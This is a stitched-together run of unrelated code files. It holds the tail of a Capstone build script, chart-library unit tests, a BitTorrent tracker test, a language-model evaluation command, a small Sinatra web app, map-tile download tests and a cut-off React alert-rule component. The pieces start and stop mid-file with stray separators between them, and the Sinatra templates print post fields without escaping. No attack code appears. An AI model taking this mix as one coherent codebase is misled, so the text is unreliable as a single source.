	CROSS="$TOOLCHAIN/bin/$CROSS" CFLAGS="--sysroot=$PLATFORM" LDFLAGS="--sysroot=$PLATFORM" ${MAKE} $*
}
# Default build: on macOS produce both 32- and 64-bit Intel slices;
# forward $CC to make only when the caller has set it.
function build {
	if [ $(uname -s) = Darwin ]; then
		export LIBARCHS="i386 x86_64"
	fi
	if [ -z "$CC" ]; then
		${MAKE} $*
	else
		${MAKE} CC="$CC" $*
	fi
}
# Install the built library system-wide. macOS installs under /usr/local
# (removing stale /usr copies first) and passes an explicit pkg-config dir;
# other systems choose lib vs lib64 based on what exists.
function install {
	# Mac OSX needs to find the right directory for pkgconfig
	if [ "$(uname)" == "Darwin" ]; then
		# we are going to install into /usr/local, so remove old installs under /usr
		rm -rf /usr/lib/libcapstone.*
		rm -rf /usr/include/capstone
		# install into /usr/local
		export PREFIX=/usr/local
		# find the directory automatically, so we can support both Macport & Brew
		PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)"
		# set PKGCFGDIR only in non-Brew environment & pkg-config is available
		# NOTE(review): the unquoted ${VAR}x != x idiom is a non-empty test that
		# breaks on values containing spaces -- confirm before "fixing" quoting.
		if [ "$HOMEBREW_CAPSTONE" != "1" ] && [ ${PKGCFGDIR}x != x ]; then
			if [ ${CC}x != x ]; then
				${MAKE} CC=$CC PKGCFGDIR=$PKGCFGDIR install
			else
				${MAKE} PKGCFGDIR=$PKGCFGDIR install
			fi
		else
			if [ ${CC}x != x ]; then
				${MAKE} CC=$CC install
			else
				${MAKE} install
			fi
		fi
	else # not OSX
		# Distros with split 64-bit libraries (e.g. Fedora/RHEL) get lib64.
		if test -d /usr/lib64; then
			if [ -n "$CC" ]; then
				${MAKE} LIBDIRARCH=lib64 CC="$CC" install
			else
				${MAKE} LIBDIRARCH=lib64 install
			fi
		else
			if [ -n "$CC" ]; then
				${MAKE} CC="$CC" install
			else
				${MAKE} install
			fi
		fi
	fi
}
# Remove an installed copy; mirrors install's macOS pkg-config and lib64 logic.
function uninstall {
	# Mac OSX needs to find the right directory for pkgconfig
	if [ "$(uname)" == "Darwin" ]; then
		# find the directory automatically, so we can support both Macport & Brew
		PKGCFGDIR="$(pkg-config --variable pc_path pkg-config | cut -d ':' -f 1)"
		export PREFIX=/usr/local
		# non-empty test (same unquoted ${VAR}x idiom as install)
		if [ ${PKGCFGDIR}x != x ]; then
			${MAKE} PKGCFGDIR=$PKGCFGDIR uninstall
		else
			${MAKE} uninstall
		fi
	else # not OSX
		if test -d /usr/lib64; then
			${MAKE} LIBDIRARCH=lib64 uninstall
		else
			${MAKE} uninstall
		fi
	fi
}
# Platform setup: GNU make (and gcc on Solaris) where plain `make` is BSD make.
MAKE=make
if [ "$(uname)" == "SunOS" ]; then
export MAKE=gmake
export INSTALL_BIN=ginstall
export CC=gcc
fi
if [[ "$(uname)" == *BSD* ]]; then
export MAKE=gmake
export PREFIX=/usr/local
fi
# First argument selects the build flavour; remaining args are passed to make.
TARGET="$1"
shift
case "$TARGET" in
"" ) build $*;;
"default" ) build $*;;
"debug" ) CAPSTONE_USE_SYS_DYN_MEM=yes CAPSTONE_STATIC=yes CFLAGS='-O0 -g -fsanitize=address' LDFLAGS='-fsanitize=address' build $*;;
"install" ) install;;
"uninstall" ) uninstall;;
"nix32" ) CFLAGS=-m32 LDFLAGS=-m32 build $*;;
"cross-win32" ) CROSS=i686-w64-mingw32- build $*;;
"cross-win64" ) CROSS=x86_64-w64-mingw32- build $*;;
"cygwin-mingw32" ) CROSS=i686-pc-mingw32- build $*;;
"cygwin-mingw64" ) CROSS=x86_64-w64-mingw32- build $*;;
"cross-android" ) build_android $*;;
"clang" ) CC=clang build $*;;
"gcc" ) CC=gcc build $*;;
"ios" ) build_iOS $*;;
"ios_armv7" ) build_iOS armv7 $*;;
"ios_armv7s" ) build_iOS armv7s $*;;
"ios_arm64" ) build_iOS arm64 $*;;
"osx-kernel" ) CAPSTONE_USE_SYS_DYN_MEM=yes CAPSTONE_HAS_OSXKERNEL=yes CAPSTONE_ARCHS=x86 CAPSTONE_SHARED=no CAPSTONE_BUILD_CORE_ONLY=yes build $*;;
# NOTE(review): the usage line omits the "debug" and "osx-kernel" targets listed above.
* ) echo "Usage: make.sh [nix32|cross-win32|cross-win64|cygwin-mingw32|cygwin-mingw64|ios|ios_armv7|ios_armv7s|ios_arm64|cross-android arm|cross-android arm64|clang|gcc|install|uninstall]"; exit 1;;
esac
package com.github.mikephil.charting.test;
import com.github.mikephil.charting.data.*;
import com.github.mikephil.charting.highlight.Highlight;
import com.github.mikephil.charting.interfaces.datasets.IPieDataSet;
import org.junit.Test;
import java.util.ArrayList;
import java.util.List;
import static junit.framework.Assert.assertEquals;
import static junit.framework.Assert.assertNull;
import static org.junit.Assert.assertTrue;
/**
 * Unit tests for {@code PieData}/{@code PieDataSet}: null-entry handling,
 * data-set lookup by index and label, and min/max/sum aggregation over
 * positive, negative, mixed, boundary and all-zero entry values.
 */
public class PieDataTest {

    @Test
    // for coverage
    public void testNullObjects(){
        // create a DataSet of empty ArrayList
        List<PieEntry> values1 = new ArrayList<>();
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        // Create another DataSet from copy of dataSet1, and clear it.
        DataSet pieDataSet2 = pieDataSet1.copy();
        pieDataSet2.clear();
        pieDataSet2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
        assertEquals(-Float.MAX_VALUE, pieDataSet2.getYMax(), 0.01f);
        // Add a null object to a PieDataSet
        pieDataSet2.addEntry(null);
        pieDataSet2.calcMinMax();
        assertEquals(-Float.MAX_VALUE, pieDataSet2.getYMax(), 0.01f);
        // Add a meaningful object to a PieDataSet
        PieEntry pieEntry = new PieEntry(6);
        // FIX: compare floats with an explicit delta instead of the boxed
        // Object-equality overload assertEquals(Object, Object).
        assertEquals(6f, pieEntry.getValue(), 0.01f);
        pieDataSet2.addEntry(pieEntry);
        pieDataSet2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
        assertEquals(6f, pieDataSet2.getYMax(), 0.01f);
        // the DataSet in pieData1 is an empty List
        PieData pieData1 = new PieData(pieDataSet1);
        pieData1.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
        IPieDataSet dataSet1 = pieData1.getDataSetByIndex(0);
        // FIX: same delta-less float comparison as above.
        assertEquals(-Float.MAX_VALUE, dataSet1.getYMax(), 0.01f);
        // Construct a pieData by passing nothing
        try{
            PieData pieData2 = new PieData();
            pieData2.calcMinMaxY(Float.MIN_VALUE, Float.MAX_VALUE);
            // since in its source code, getDataSetByIndex doesn't check
            // whether the ArraryList is existing, it will always return
            // ArrayList.get(0) without an exception
            assertNull(pieData2.getDataSetByIndex(0));
        } catch (IndexOutOfBoundsException e){
            boolean thrown = true;
            assertTrue(thrown);
        }
    }

    @Test
    public void testPositiveInvalidIndex(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(i*10)); // 0 10 20 30 40
            values2.add(new PieEntry(i*3)); // 0 3 6 9 12
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // PieData holds exactly one data set, so index 1 is out of range.
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
    }

    @Test
    public void testNegativeInvalidIndex(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(i*10)); // 0 10 20 30 40
            values2.add(new PieEntry(i*3)); // 0 3 6 9 12
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // Negative indices must also yield null rather than throwing.
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(-1);
        assertEquals(null, after_pieDataSet1);
    }

    @Test
    public void testValidIndex(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(i*10)); // 0 10 20 30 40
            values2.add(new PieEntry(i*3)); // 0 3 6 9 12
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(40f, after_pieDataSet1.getYMax(), 0.01f);
    }

    @Test
    public void testDifferentDataTypeInput(){
        // create a list of PieEntry (int- vs long-sourced values)
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry((int) i*10)); // 0 10 20 30 40 ->int
            values2.add(new PieEntry((long) i*3)); // 0 3 6 9 12 ->long
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(40f, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(0f, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 0+10+20+30+40
        assertEquals(100f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(40f, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(12f, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(0f, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 0+3+6+9+12
        assertEquals(30f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(12f, entry2.getY(), 0.01f);
    }

    @Test
    public void testPositiveInputEntries(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(i*10)); // 0 10 20 30 40
            values2.add(new PieEntry(i*3)); // 0 3 6 9 12
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(40f, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(0f, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 0+10+20+30+40
        assertEquals(100f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(40f, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(12f, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(0f, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 0+3+6+9+12
        assertEquals(30f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(12f, entry2.getY(), 0.01f);
    }

    @Test
    public void testAllTheSameInputEntries(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(2)); // 2 2 2 2 2
            values2.add(new PieEntry(1)); // 1 1 1 1 1
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(2f, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(2f, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 2*5 (comment fixed; was a copy-paste of another case)
        assertEquals(10f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(2f, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(1f, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(1f, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 1*5
        assertEquals(5f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(1f, entry2.getY(), 0.01f);
    }

    @Test
    public void testNegativeInputEntries(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(-i*10)); // 0 -10 -20 -30 -40
            values2.add(new PieEntry(-i*3)); // 0 -3 -6 -9 -12
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(0f, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(-40f, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 0-10-20-30-40 (comment fixed)
        assertEquals(-100f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(-40f, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(0f, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(-12f, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 0-3-6-9-12 (comment fixed)
        assertEquals(-30f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(-12f, entry2.getY(), 0.01f);
    }

    @Test
    public void testMixedInputEntries(){
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(-i*10+20)); // 20 10 0 -10 -20
            values2.add(new PieEntry(-i*3+6)); // 6 3 0 -3 -6
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(20f, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(-20f, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 20+10+0-10-20 = 0 (comment fixed)
        assertEquals(0, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(-20f, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(6f, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(-6f, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 6+3+0-3-6 = 0 (comment fixed)
        assertEquals(0f, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(-6f, entry2.getY(), 0.01f);
    }

    @Test
    public void testBoundaryInputEntries(){
        // Float.MAX_VALUE / Float.MIN_VALUE boundary values.
        // create a list of PieEntry
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(Float.MAX_VALUE)); // Float.MAX_VALUE * 5
            values2.add(new PieEntry(Float.MIN_VALUE)); // Float.MIN_VALUE * 5
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(Float.MAX_VALUE, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(Float.MAX_VALUE, after_pieDataSet1.getYMin(), 0.01f);
        // getYValueSum()_1 -- NOTE(review): 5 * Float.MAX_VALUE overflows float;
        // the original author marked this assertion FAILED. Verify whether
        // getYValueSum saturates before relying on it.
        assertEquals(Float.MAX_VALUE, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(Float.MAX_VALUE, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(Float.MIN_VALUE, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(Float.MIN_VALUE, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 5 * Float.MIN_VALUE is ~0 within the delta
        assertEquals(Float.MIN_VALUE, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(Float.MIN_VALUE, entry2.getY(), 0.01f);
    }

    @Test
    public void testAllZeroInputEntries(){
        // create a list of PieEntry, every value zero
        List<PieEntry> values1 = new ArrayList<>();
        List<PieEntry> values2 = new ArrayList<>();
        for(int i = 0; i < 5; i++){
            values1.add(new PieEntry(0)); // 0 * 5
            values2.add(new PieEntry(0)); // 0 * 5
        }
        PieDataSet pieDataSet1 = new PieDataSet(values1, "Set1");
        PieDataSet pieDataSet2 = new PieDataSet(values2, "Set2");
        PieData pieData = new PieData(pieDataSet1);
        // testing setDataSet_1
        // testing getDataSet_1.1: maximum of Y
        IPieDataSet after_pieDataSet1 = pieData.getDataSetByIndex(1);
        assertEquals(null, after_pieDataSet1);
        if(after_pieDataSet1 == null) after_pieDataSet1 = pieData.getDataSetByIndex(0);
        assertEquals(0, after_pieDataSet1.getYMax(), 0.01f);
        // testing getDataSet_1.2: minimum of Y
        assertEquals(0, after_pieDataSet1.getYMin(), 0.01f);
        // testing getYValueSum()_1: 0*5 (comment fixed)
        assertEquals(0, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_1
        Entry entry1 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(0, entry1.getY(), 0.01f);
        // testing setDataSet_2
        pieData.setDataSet(pieDataSet2);
        // testing getDataSet_2.1: maximum of Y
        IPieDataSet after_pieDataSet2 = pieData.getDataSetByLabel("Set2", true);
        assertEquals(0, after_pieDataSet2.getYMax(), 0.01f);
        // testing getDataSet_2.2: minimum of Y
        assertEquals(0, after_pieDataSet2.getYMin(), 0.01f);
        // testing getYValueSum()_2: 0*5 (comment fixed)
        assertEquals(0, pieData.getYValueSum(), 0.01f);
        // testing getEntryForHighlight()_2
        Entry entry2 = pieData.getEntryForHighlight(new Highlight(4,0,0));
        assertEquals(0, entry2.getY(), 0.01f);
    }
}
|
package com.acgist.snail.net.torrent.tracker;
import org.junit.jupiter.api.Test;
import com.acgist.snail.context.TorrentContext;
import com.acgist.snail.context.exception.DownloadException;
import com.acgist.snail.context.exception.NetException;
import com.acgist.snail.pojo.session.TorrentSession;
import com.acgist.snail.utils.Performance;
/**
 * Manual integration test for HTTP tracker announces: loads a torrent from a
 * hard-coded local path and announces it to a live tracker, so it requires
 * network access and that file to exist. Not suitable for CI as-is.
 */
public class HttpTrackerSessionTest extends Performance {
@Test
public void testAnnounce() throws DownloadException, NetException {
// NOTE(review): machine-specific absolute path -- the test fails on any other host.
final String path = "E:/snail/902FFAA29EE632C8DC966ED9AB573409BA9A518E.torrent";
final TorrentSession torrentSession = TorrentContext.getInstance().newTorrentSession(path);
final HttpTrackerSession session = HttpTrackerSession.newInstance("http://5rt.tace.ru:60889/announce");
// final HttpTrackerSession session = HttpTrackerSession.newInstance("http://opentracker.acgnx.se/announce");
// final HttpTrackerSession session = HttpTrackerSession.newInstance("http://tracker3.itzmx.com:6961/announce");
// Announce "started" with 1000 bytes left to download.
session.started(1000, torrentSession);
// session.scrape(1000, session);
}
}
|
python transformers/examples/language-modeling/run_language_modeling.py --model_name_or_path train-outputs/1024+0+512-SWS/model --tokenizer_name model-configs/1536-config --eval_data_file ../data/wikitext-103-raw/wiki.valid.raw --output_dir eval-outputs/1024+0+512-SWS/512+512+512-shuffled-N-first-256 --do_eval --per_device_eval_batch_size 1 --dataloader_drop_last --augmented --augmentation_function shuffle_remove_all_but_nouns_first_third_sixth --eval_function penultimate_sixth_eval |
require 'sinatra'
require 'mongoid'

# Connect to MongoDB using the settings in mongoid.yml.
Mongoid.load!("mongoid.yml")

# List all posts from the `Posts` collection, newest first.
get '/posts' do
  @posts = Post.order(created_at: :desc).all
  erb :index
end

# Show a single post by its id.
# BUG FIX: Mongoid document ids are BSON ObjectId strings, not integers.
# Calling `.to_i` on a hex ObjectId string mangles it (usually to 0), so the
# lookup could never match. Pass the raw id string through to `find`.
get '/posts/:id' do
  @post = Post.find(params[:id])
  erb :show
end

# Inline ERB templates served from Sinatra's __END__ data section.
__END__
@@ layout
<html>
<head>
<title>My App</title>
</head>
<body>
<%= yield %>
</body>
</html>
@@ index
<ul>
<% @posts.each do |post| %>
<li><a href="/posts/<%= post.id %>"><%= post.title %></a></li>
<% end %>
</ul>
@@ show
<h1><%= @post.title %></h1>
<p><%= @post.body %></p>
<gh_stars>1-10
import pytest
import os
import constants as c
import iosm
def area_coor():
    """Bounding box of the test area: Inaccessible Island, south Atlantic Ocean.

    Returns:
        tuple: ``(lon_min, lon_max, lat_min, lat_max)`` in decimal degrees.
    """
    # (west, east, south, north) edges of the island's bounding box.
    return -12.707272, -12.640879, -37.322413, -37.279825
def area_tiles(zoom):
    """Tile-index ranges covering the test area at the given zoom level.

    Args:
        zoom: OSM zoom level.

    Returns:
        tuple(range, range): x-tile and y-tile ranges, inclusive of the
        maximum tile index.
    """
    lon_min, lon_max, lat_min, lat_max = area_coor()
    # The north-west corner maps to the smallest tile indices…
    x_min, y_min = iosm.deg2num(lat_max, lon_min, zoom)
    # …and the south-east corner to the largest.
    x_max, y_max = iosm.deg2num(lat_min, lon_max, zoom)
    return range(x_min, x_max + 1), range(y_min, y_max + 1)
@pytest.fixture(scope="session", autouse=True)
def remove_test_files():
    """Autouse session fixture: delete tiles left over from earlier test runs.

    Ensures download tests start from a clean slate so "already downloaded"
    short-circuits in the code under test cannot mask failures.
    """
    # Walk every zoom level the project supports.
    for zoom in range(c.max_zoom + 1):
        xtiles, ytiles = area_tiles(zoom)
        for x in xtiles:
            for y in ytiles:
                # Tiles are stored on disk as tiles/<zoom>/<x>/<y>.png
                tile_path = f'tiles/{zoom}/{x}/{y}.png'
                if os.path.isfile(tile_path):
                    os.remove(tile_path)
def test_deg2num():
    """Placeholder: deg2num is trusted upstream code, so nothing is asserted."""
    # This function was copied from OSM wiki, no expected fail
    assert True
def test_num2deg():
    """Placeholder: num2deg is trusted upstream code, so nothing is asserted."""
    # This function was copied from OSM wiki, no expected fail
    assert True
def test_download_url_nominal():
    """Downloading a real tile inside the test area at max zoom must succeed."""
    x_range, y_range = area_tiles(c.max_zoom)
    assert iosm._download_url(c.max_zoom, x_range.start, y_range.start)
def test_download_url_existing_tile():
    """Re-requesting a tile that is already on disk should still succeed."""
    # Same tile as the nominal test — by this point it already exists locally.
    x_range, y_range = area_tiles(c.max_zoom)
    assert iosm._download_url(c.max_zoom, x_range.start, y_range.start)
def test_download_url_wrong_tile():
    """A nonexistent zoom/x/y combination must fail to download."""
    bogus = 12345689  # no tile exists for this value in zoom/x/y
    assert not iosm._download_url(bogus, bogus, bogus)
def test_download_tiles_by_deg():
    """Tile count reported for the area must match the per-zoom expectation."""
    my_zoom = 10
    # Number of tiles the test area spans at each zoom level (0..14).
    tiles_per_zoom = {0: 1, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1, 6: 1, 7: 1, 8: 2,
                      9: 2, 10: 2, 11: 4, 12: 4, 13: 6, 14: 16}
    # Only zoom levels up to and including my_zoom are downloaded.
    expected_total = sum(n for z, n in tiles_per_zoom.items() if z <= my_zoom)
    lon_min, lon_max, lat_min, lat_max = area_coor()
    assert iosm.download_tiles_by_deg(lat_min, lon_min, lat_max, lon_max,
                                      max_zoom=my_zoom) == expected_total
def test_download_tiles_by_num():
    """Downloading an explicit 3x3 tile window must report 9 tiles."""
    my_zoom = 10
    lon_min, lon_max, lat_min, lat_max = area_coor()
    x_min, y_min = iosm.deg2num(lat_min, lon_min, my_zoom)
    # Both limits are inclusive, so this is a 3x3 window.
    x_max, y_max = x_min + 2, y_min + 2
    expected = (x_max - x_min + 1) * (y_max - y_min + 1)
    assert iosm.download_tiles_by_num(x_min, y_min, x_max, y_max,
                                      max_zoom=my_zoom) == expected
|
import {Link} from 'react-router';
import {RouteComponentProps} from 'react-router/lib/Router';
import {css} from '@emotion/core';
import PropTypes from 'prop-types';
import React from 'react';
import styled from '@emotion/styled';
import {IssueAlertRule} from 'app/types/alerts';
import {SavedIncidentRule} from 'app/views/settings/incidentRules/types';
import {getDisplayName} from 'app/utils/environment';
import {t, tct} from 'app/locale';
import recreateRoute from 'app/utils/recreateRoute';
import space from 'app/styles/space';
/**
 * Type guard discriminating the two rule shapes: a saved incident (metric)
 * rule always carries a `triggers` property, an issue rule never does.
 */
function isIssueAlert(data: IssueAlertRule | SavedIncidentRule): data is IssueAlertRule {
  // `in` replaces `data.hasOwnProperty('triggers')`: calling hasOwnProperty
  // through the instance is flagged by eslint (no-prototype-builtins), and the
  // `in` operator is the idiomatic TS narrowing check for plain data objects.
  return !('triggers' in data);
}
// Props for one alert-rule row. Routing props are picked from react-router so
// edit links can be recreated relative to the current route tree.
type Props = {
  // The rule to render — an issue alert rule or a saved metric (incident) rule.
  data: IssueAlertRule | SavedIncidentRule;
  type: 'issue' | 'metric';
  // Is the alert rule editable?
  canEdit?: boolean;
} & Pick<
  RouteComponentProps<{orgId: string; projectId: string}, {}>,
  'params' | 'routes' | 'location'
>;

// NOTE(review): loading/error are initialized but never toggled in this file —
// presumably left over from removed fetch logic; confirm before pruning.
type State = {
  loading: boolean;
  error: boolean;
};
/**
 * One row of an alert-rule listing. Renders either an issue rule or a metric
 * (incident) rule, dispatching on the `isIssueAlert` type guard.
 */
class RuleRow extends React.Component<Props, State> {
  // Runtime prop validation kept alongside the compile-time Props type.
  static propTypes: any = {
    data: PropTypes.object.isRequired,
    canEdit: PropTypes.bool,
  };

  state = {loading: false, error: false};

  // Renders the type / name / conditions / actions cells for an issue rule.
